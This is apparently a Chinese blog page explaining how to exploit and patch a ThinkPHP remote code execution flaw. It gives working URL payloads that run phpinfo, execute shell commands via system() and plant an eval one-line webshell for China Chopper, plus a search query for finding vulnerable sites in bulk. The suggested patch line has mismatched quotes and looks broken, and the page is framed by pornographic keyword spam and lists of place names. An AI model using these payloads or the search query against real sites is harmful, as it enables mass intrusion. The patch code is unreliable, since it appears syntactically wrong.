91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何利用及修復ThinkPHP框架任意代碼執行漏洞

發布時間:2021-09-29 10:00:12 來源:億速云 閱讀:113 作者:iii 欄目:開發技術

這篇文章主要講解了“如何利用及修復ThinkPHP框架任意代碼執行漏洞”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“如何利用及修復ThinkPHP框架任意代碼執行漏洞”吧!

近期thinkphp框架爆出了一個任意代碼執行漏洞,其危害性相當的高,漏洞利用方法如下:

index.php/module/aciton/param1/${@print(THINK_VERSION)}
 
index.php/module/aciton/param1/${@function_all()}

其中的function_all代表任何函數,比如:

index.php/module/aciton/param1/${@phpinfo()}

就可以獲取服務器的系統配置信息等。

index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

可以列出網站文件列表

index.php/module/action/param1/{${eval($_POST[s])}}

就可以直接執行一句話代碼,用菜刀直接連接.

這樣黑客們就可以直接通過google批量搜索關鍵字:thinkphp intitle:系統發生錯誤 來獲取更多使用thinkphp框架的網站列表。可見其危害性相當的大。
 
thinkphp框架執行任意代碼漏洞修復方法:
 
用戶可下載官方發布的補丁:
 
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
 
或者或者直接修改源碼:

將/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

修改為:

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));

將preg_replace第二個參數中的雙引號改為單引號,防止其中的php變量語法被解析執行。

感謝各位的閱讀,以上就是“如何利用及修復ThinkPHP框架任意代碼執行漏洞”的內容了,經過本文的學習后,相信大家對如何利用及修復ThinkPHP框架任意代碼執行漏洞這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是億速云,小編將為大家推送更多相關知識點的文章,歡迎關注!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

连南| 临朐县| 会宁县| 海南省| 滦平县| 万山特区| 巴彦淖尔市| 综艺| 衡山县| 湖口县| 大冶市| 东港市| 天祝| 昭觉县| 襄汾县| 巨野县| 天镇县| 连州市| 嘉义县| 抚顺县| 和龙市| 翁源县| 北碚区| 崇文区| 东乌珠穆沁旗| 易门县| 格尔木市| 顺义区| 逊克县| 玉环县| 平泉县| 渭源县| 仙桃市| 宝丰县| 游戏| 盐边县| 满洲里市| 渭南市| 安化县| 林口县| 石门县|